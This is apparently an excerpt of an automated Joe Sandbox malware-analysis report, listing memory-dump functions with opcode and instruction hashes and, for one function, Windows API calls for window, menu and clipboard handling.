Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead210ddbca45e8d6e95948d3c7b63acfb0e3c71d10d7132f366b31723752c71
Instruction ID: 4883f5f063f1db0e57a6b877f802a8e695e10ca9b42baacbc67d180e02f3a667
Opcode Fuzzy Hash: ead210ddbca45e8d6e95948d3c7b63acfb0e3c71d10d7132f366b31723752c71
Instruction Fuzzy Hash: 51C1C074E10218CFDB54DFA9C994B9DBBB2AF89301F1081AAD808AB355DB359E85CF11

Function 373A3F70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e22564c445e035cc98f1b8d5e831a700a9f19e2b6004ae7e8b9912bb7c89d8e
Instruction ID: 146887cfdb8bdbf9a0c918260a8e20d8f15dec9be5fe30dfe6a4f1341b61efb6
Opcode Fuzzy Hash: 7e22564c445e035cc98f1b8d5e831a700a9f19e2b6004ae7e8b9912bb7c89d8e
Instruction Fuzzy Hash: BAC1C174E01218CFDB54DFA9C994B9DBBB2BF89301F2081AAD408AB355DB359E85CF11

Function 373A0FA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97be4bd51b65b95834c291f0bc909637f30233933d30326741f96c6c80feb2e3
Instruction ID: b434d05b807d38caac46ff6c0340bd65fc342781ecbc41ff46bc92e7ff655fa9
Opcode Fuzzy Hash: 97be4bd51b65b95834c291f0bc909637f30233933d30326741f96c6c80feb2e3
Instruction Fuzzy Hash: 49C1C174E10218CFDB54DFA9C994B9DBBB2BF89301F2081AAD408AB355DB359E85CF11

Function 373A67C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1cfd3382828f78179af320f8fcb0831c0c86691b45cf35f5be898ca318e401
Instruction ID: 4a405802e2a5d306bb85868100c7d529f2a14b4cc7a9003a4374fbee05101df7
Opcode Fuzzy Hash: 3e1cfd3382828f78179af320f8fcb0831c0c86691b45cf35f5be898ca318e401
Instruction Fuzzy Hash: 44C1C174E11218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB355DB359E85CF10

Function 373A2E10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb1b3b6e2fbc72a57512cc8e71d2aae7e747abe2824e1ecd5e48013611771994
Instruction ID: fdf086172c8827aa9901e0a98ca67755c4c1f7daf959f0aec31b74216976430b
Opcode Fuzzy Hash: cb1b3b6e2fbc72a57512cc8e71d2aae7e747abe2824e1ecd5e48013611771994
Instruction Fuzzy Hash: B5C1C274E00218CFDB54DFA9C994B9DBBB2AF89301F1081AAD809AB354DB359E85CF11

Function 373A5660 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed681a92378c947fe77b63601117fb36f7b6fbea2e104eae9e2c8a62a96ef355
Instruction ID: 22331860872cade465a9f7bfd44cc81340032906c2aed94aebf5bd74a1cf71cc
Opcode Fuzzy Hash: ed681a92378c947fe77b63601117fb36f7b6fbea2e104eae9e2c8a62a96ef355
Instruction Fuzzy Hash: 97C1C174E10218CFDB54DFA9C994B9DBBB2AF89301F1081AAD808AB355DB359E85CF11

Function 373A36C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64f703de97161a32034a385b23308171ef1c19922f952c1db1fb115a5c79425
Instruction ID: 0efe497d42fc1d49c443ef8e3410ded9c4d34779c222c537b211dd825c84655f
Opcode Fuzzy Hash: d64f703de97161a32034a385b23308171ef1c19922f952c1db1fb115a5c79425
Instruction Fuzzy Hash: EAC1C274E11218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB354DB359E85CF11

Function 373A2560 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda8aefd5d81048adc3e5f77fc6bdd69c67434a155417b89974b48b632444e2a
Instruction ID: 04957d176448f62bdabe039c03ebf4d9d3963802dd45a5a9099a58b7936cec58
Opcode Fuzzy Hash: eda8aefd5d81048adc3e5f77fc6bdd69c67434a155417b89974b48b632444e2a
Instruction Fuzzy Hash: 6AC1B174E11218CFDB54DFA9C994B9DBBB2EF89301F1081AAD808AB355DB359E85CF10

Function 373A4DB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2083cdb83c930759d72f8e9e45cc587c88e15efebdbe54b586a58dfaf6a802e1
Instruction ID: ca1f6df44cb764ae44db2a205df8c27ff8a79c0bb8b5c9e3ccad0d39ed7c855b
Opcode Fuzzy Hash: 2083cdb83c930759d72f8e9e45cc587c88e15efebdbe54b586a58dfaf6a802e1
Instruction Fuzzy Hash: FEC1C274E01218CFDB54DFA9C994B9DBBB2BF89301F2091AAD408AB355DB345E85CF50

Function 373A6C18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8fe54ca363ea048cec58c15df490246069ae93f6615c42ff4607006db678a48
Instruction ID: 0b7f389a5bbf77b4e9916441a85a4e5e8928e940be27021b6f86e6dd9d0ccd0f
Opcode Fuzzy Hash: b8fe54ca363ea048cec58c15df490246069ae93f6615c42ff4607006db678a48
Instruction Fuzzy Hash: 56C1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD408AB355DB35AE85CF11

Function 373A1400 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e536aab79e1f0e18fd36d34d7de05e762821a6a505515f6e063f76bc3c4999d7
Instruction ID: 99165f7e6789c0879be6158cd5aeae9afa5958cac380bae1bd26eeab481e6217
Opcode Fuzzy Hash: e536aab79e1f0e18fd36d34d7de05e762821a6a505515f6e063f76bc3c4999d7
Instruction Fuzzy Hash: 99C1C274E00218CFDB54DFA9C994B9DBBB2AF89301F1091AAD808AB354DB359E85CF11

Function 373A1CB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b66051642ce7d6d3ea27f1e04014da0848970d18289e4a3f0c1b73763afb427
Instruction ID: 8ff10329dbf34130a051c9f551dfafdb3534b6e09b09f80d5e3d8e967d40acd0
Opcode Fuzzy Hash: 1b66051642ce7d6d3ea27f1e04014da0848970d18289e4a3f0c1b73763afb427
Instruction Fuzzy Hash: 28C1C174E00218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB355DB355E85CF11

Function 373A74C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c382f454630fde6a96912079d144cea909ac5e901fa678ba1ae62f8a64f5cb51
Instruction ID: 82e8d95da634c890c27f2ef1b76aff8ed7baadd5f908ec10928a1447bc867c15
Opcode Fuzzy Hash: c382f454630fde6a96912079d144cea909ac5e901fa678ba1ae62f8a64f5cb51
Instruction Fuzzy Hash: EEC1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD408AB355DB359E85CF10

Function 373A3B18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46b3ff0aa3cb4299e6f9906b0f7957c2df3cf0d561536438229de91c3ef71d67
Instruction ID: a7b62d398f3ac3cb941d6231261f715f4f985109e3b761a630180fec4da0a981
Opcode Fuzzy Hash: 46b3ff0aa3cb4299e6f9906b0f7957c2df3cf0d561536438229de91c3ef71d67
Instruction Fuzzy Hash: 4EC1C174E11258CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB354DB349E85CF11

Function 373A6368 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944841fb772e81018c05121c3292c44a8a60f9b956c85f0514a798e4c666cf88
Instruction ID: 950123037169b1953d2818bfe64348c7f292b7453622a9795fd3fb425824809b
Opcode Fuzzy Hash: 944841fb772e81018c05121c3292c44a8a60f9b956c85f0514a798e4c666cf88
Instruction Fuzzy Hash: A5C1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1091AAD408AB355DB35AE85CF10

Function 373A43C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5bb447a31de339421603aeae5e4c6dcb50880867ccf40be8eea506c07e684f
Instruction ID: d532b39c86cadabc9c3a7fc9b2f24c85eca021613fcc5a3d89e0c0f4ff7e0e18
Opcode Fuzzy Hash: 8c5bb447a31de339421603aeae5e4c6dcb50880867ccf40be8eea506c07e684f
Instruction Fuzzy Hash: E1C1C274E00258CFDB54DFA9C994B9DBBB2BF89301F1081AAD409AB355DB355E85CF10

Function 373A5208 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123767488a0df7f1cde1197ef1e7145bdcebe338f7d8d9c2f64aaf6017904bb6
Instruction ID: fdd5b1cb911b1cce079270aab9c5a5cc04494afbd1b6e027165962737ccfbd12
Opcode Fuzzy Hash: 123767488a0df7f1cde1197ef1e7145bdcebe338f7d8d9c2f64aaf6017904bb6
Instruction Fuzzy Hash: DFC1D274E10218CFDB54DFA9C994B9DBBB2BF89301F2081AAD409AB354DB359E85CF10

Function 373A3268 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da614d9b2d6ca65385c4cbe2b9bbaf4363980a678d37e9c8424f66b3bf861997
Instruction ID: 555073f751b1f6e210d66734a6554d4116597057eff83a5162a78ea60b1b61b2
Opcode Fuzzy Hash: da614d9b2d6ca65385c4cbe2b9bbaf4363980a678d37e9c8424f66b3bf861997
Instruction Fuzzy Hash: A4C1B174E10218CFDB54DFA9C994B9DBBB2AF89301F1081AAD808AB355DB359E85CF11

Function 373A5AB8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1dc1fcb3724901363086bcc5b2e39eeb84bff4bae27213823f0b76394601e57
Instruction ID: 51a0733874e072af1ca2a800cfef3c1ececd596b6f4c393b5db62eb9df4d9218
Opcode Fuzzy Hash: b1dc1fcb3724901363086bcc5b2e39eeb84bff4bae27213823f0b76394601e57
Instruction Fuzzy Hash: A6C1C274E10218CFDB54DFA9C994B9DBBB2BF89301F2081AAD809AB355DB345E85CF11

Function 373A2108 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5a2a01336cd47161351c75c99883de31e91787f32b51ff20c3d50af605490a
Instruction ID: 1298aa78ffddee250130f42dd34375a3f9997db1abc11e598f14923f08a5d1fa
Opcode Fuzzy Hash: 4e5a2a01336cd47161351c75c99883de31e91787f32b51ff20c3d50af605490a
Instruction Fuzzy Hash: 17C1C274E00218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB354DB359E85CF10

Function 373A29B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bc86875790d04fc80a628cc03c8ee1ea5ed89f210061b204d0c82a1c89ae4dc
Instruction ID: 0ae8a22942e3028c7b3f26d72869a3223faaf59a4736f1fe152487f2e2a2a48d
Opcode Fuzzy Hash: 1bc86875790d04fc80a628cc03c8ee1ea5ed89f210061b204d0c82a1c89ae4dc
Instruction Fuzzy Hash: EFC1C174E00218CFDB54DFA9C994B9DBBB2BF89301F1081AAD408AB355DB355E85CF11

Function 373A4820 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 484c90ab0847c46aaf2f2649068c55ad4417073278b856207e2dfe86d2884199
Instruction ID: b02d7f37f6a182b89b3bfdf31ae0c5ff13d51f86bc0486adf909fcc783f34cd5
Opcode Fuzzy Hash: 484c90ab0847c46aaf2f2649068c55ad4417073278b856207e2dfe86d2884199
Instruction Fuzzy Hash: 89C1C274E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD809AB355DB356E85CF10

Function 373A7070 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b35c7f665db389b09e65d375685b59704e35632d859851f75c6eca1bc7b382f
Instruction ID: deb61287a58cbd5f96fb2ed62ce0ec7f260163ff2884675b763de4f6ddab9505
Opcode Fuzzy Hash: 3b35c7f665db389b09e65d375685b59704e35632d859851f75c6eca1bc7b382f
Instruction Fuzzy Hash: 8AC1C174E00218CFDB54DFA9C994B9DBBB2EF89301F2081AAD808AB355DB355E85CF51

Function 373A1858 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e1241ca701b749bbb35e788320314259db3703a4344909b69b7a8aed13e3e7
Instruction ID: 7337c8903222ecf1d4bf850749e34ab2bfe4910bfd306ce42d305533facc7f5b
Opcode Fuzzy Hash: 76e1241ca701b749bbb35e788320314259db3703a4344909b69b7a8aed13e3e7
Instruction Fuzzy Hash: FFC1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD409AB355DB35AE85CF10

Function 36ECE79F Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c7006a33bae5507f1d7d77f1286ca1e158107aac1058ea5a431d669e68f0326
Instruction ID: 534e7a41747923aef663d9bbe216d6e97cbd1996d18ac8cd80de29f3bf0d9fd2
Opcode Fuzzy Hash: 9c7006a33bae5507f1d7d77f1286ca1e158107aac1058ea5a431d669e68f0326
Instruction Fuzzy Hash: D1C1C174E00218CFDB14DFA9C994B9DBBB2BF89301F2081AAD809AB355DB345E85CF10

Function 36ECEBF7 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7adec9e02099f5698999bbd970f9b6a0292a34f9b34107211ed29bb2b01c07
Instruction ID: 8f91301d8ba5a1e9de0383cea464d5ed590d4c487f33e44937df032bf1a94048
Opcode Fuzzy Hash: 2c7adec9e02099f5698999bbd970f9b6a0292a34f9b34107211ed29bb2b01c07
Instruction Fuzzy Hash: FDC1C274E00258CFDB14DFA9C994B9DBBB2BF89301F2091AAD408AB355DB349E85CF11

Function 36ECC1F2 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48bde519db541b1e6d27b536f6d45c2d1a70fdd4f6908d67562c2b173bc1fb59
Instruction ID: c7bcc0e2cef131795e1cbc3fab5d05ca3fb02ddd1490b70dbeb6866ad64bf420
Opcode Fuzzy Hash: 48bde519db541b1e6d27b536f6d45c2d1a70fdd4f6908d67562c2b173bc1fb59
Instruction Fuzzy Hash: 85C1B274E01228CFDB14DFA9C994B9DBBB2BF89301F2091AAD409AB354DB355E85CF11

Function 36ECB4EC Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1544396a9acaa05b5ffa6ec6c302c4d91b097204848346af0cd834197dd7faa1
Instruction ID: db69975976d6481ea055e0603685293c7ef0748c19b6dfa09cac8e3edda07059
Opcode Fuzzy Hash: 1544396a9acaa05b5ffa6ec6c302c4d91b097204848346af0cd834197dd7faa1
Instruction Fuzzy Hash: 66C1C174E11218CFDB14DFA9C994B9DBBB2BF89301F2091AAD808AB355DB345E85CF10

Function 36ECB944 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143a4117bd8bccf817e6e83011f7eb7e0f09183f95bd164a228e2408a10b12e1
Instruction ID: ac42019145f7977e0314efe4427dae2a36e582c8beb318db3db4d0af1d1ed2b1
Opcode Fuzzy Hash: 143a4117bd8bccf817e6e83011f7eb7e0f09183f95bd164a228e2408a10b12e1
Instruction Fuzzy Hash: 4FC1C174E10218CFDB14DFA9C994B9DBBB2BF88301F2091AAD808AB355DB355E85CF11

Function 36ECDEFA Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ef86fc0e395f9b82521366f0ded9ec1542535eeb598273722978faff109925
Instruction ID: 47c81f540c1b2c85260a1b6f51665f25d49ab48c414deca30b6f08ab1334c4cc
Opcode Fuzzy Hash: 84ef86fc0e395f9b82521366f0ded9ec1542535eeb598273722978faff109925
Instruction Fuzzy Hash: F4C1A074E10218CFDB14DFA9C994B9DBBB2BF89301F2091AAD408AB355DB359E85CF10

Function 36ECDAA2 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fbf2248c0ef757d950ba6bca0f245e7b08dcb9f00606ec1f53ba2abf0c6e439
Instruction ID: 2515bbd0df0774dc6b670dc19f77007eb0cc282650dd3063fde0fb4d681c3992
Opcode Fuzzy Hash: 7fbf2248c0ef757d950ba6bca0f245e7b08dcb9f00606ec1f53ba2abf0c6e439
Instruction Fuzzy Hash: 2AC1C174E00218CFDB14DFA9C994B9DBBB2BF89301F2081AAD409AB354DB359E85CF10

Function 36ECE352 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92d579822f7eac4c833dc77c745b2096516755f12f5a5cf1b6b25b1fef77626
Instruction ID: d14bf177dfffe21cd9cb5a71b5b80d22f121ad85da0c88da5713552854734543
Opcode Fuzzy Hash: e92d579822f7eac4c833dc77c745b2096516755f12f5a5cf1b6b25b1fef77626
Instruction Fuzzy Hash: D3C1C174E00218CFDB54DFA9C994B9DBBB2BF89301F2091AAD408AB355DB349E85CF10

Function 36ECF05A Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6cc2ab1e32e45f0d2512e344a770ae73d92d02caebba4a936da583389fd50d
Instruction ID: 1c33ff885311790b1ef09702766d5909a1fff34f218799dac479dd7eea09b5d4
Opcode Fuzzy Hash: 7c6cc2ab1e32e45f0d2512e344a770ae73d92d02caebba4a936da583389fd50d
Instruction Fuzzy Hash: 98C1B174E10218CFDB14DFA9C994B9DBBB2BF89301F2091AAD408AB355DB359E85CF11

Function 36ECB07F Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed41f1ac5ec68763d7d02643f81abe4e7dd0a8f1e2dd9f1744f2d9c1c28acca
Instruction ID: 7c930629c49cef1895bf8450044c76a74f31455feeb4e74ea64518e4250c0686
Opcode Fuzzy Hash: 1ed41f1ac5ec68763d7d02643f81abe4e7dd0a8f1e2dd9f1744f2d9c1c28acca
Instruction Fuzzy Hash: 8EC1B174E10218CFDB14DFA9C994B9DBBB2BF89301F2091AAD409AB355DB359E85CF10

Function 004052F3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405351
GetDlgItem.USER32(?,000003EE), ref: 00405360
GetClientRect.USER32(?,?), ref: 0040539D
GetSystemMetrics.USER32(00000002), ref: 004053A4
SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
ShowWindow.USER32(?,00000008), ref: 00405440
GetDlgItem.USER32(?,000003EC), ref: 00405461
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
GetDlgItem.USER32(?,000003F8), ref: 0040536F

Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C

GetDlgItem.USER32(?,000003EC), ref: 004054B3
CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
CloseHandle.KERNEL32(00000000), ref: 004054C8
ShowWindow.USER32(00000000), ref: 004054EC
ShowWindow.USER32(?,00000008), ref: 004054F1
ShowWindow.USER32(00000008), ref: 0040553B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
CreatePopupMenu.USER32 ref: 00405580
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
GetWindowRect.USER32(?,?), ref: 004055B4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
OpenClipboard.USER32(00000000), ref: 00405615
EmptyClipboard.USER32 ref: 0040561B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
GlobalLock.KERNEL32(00000000), ref: 00405631
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
GlobalUnlock.KERNEL32(00000000), ref: 00405665
SetClipboardData.USER32(0000000D,00000000), ref: 00405670
CloseClipboard.USER32 ref: 00405676

Strings

{, xrefs: 00405559

Memory Dump Source

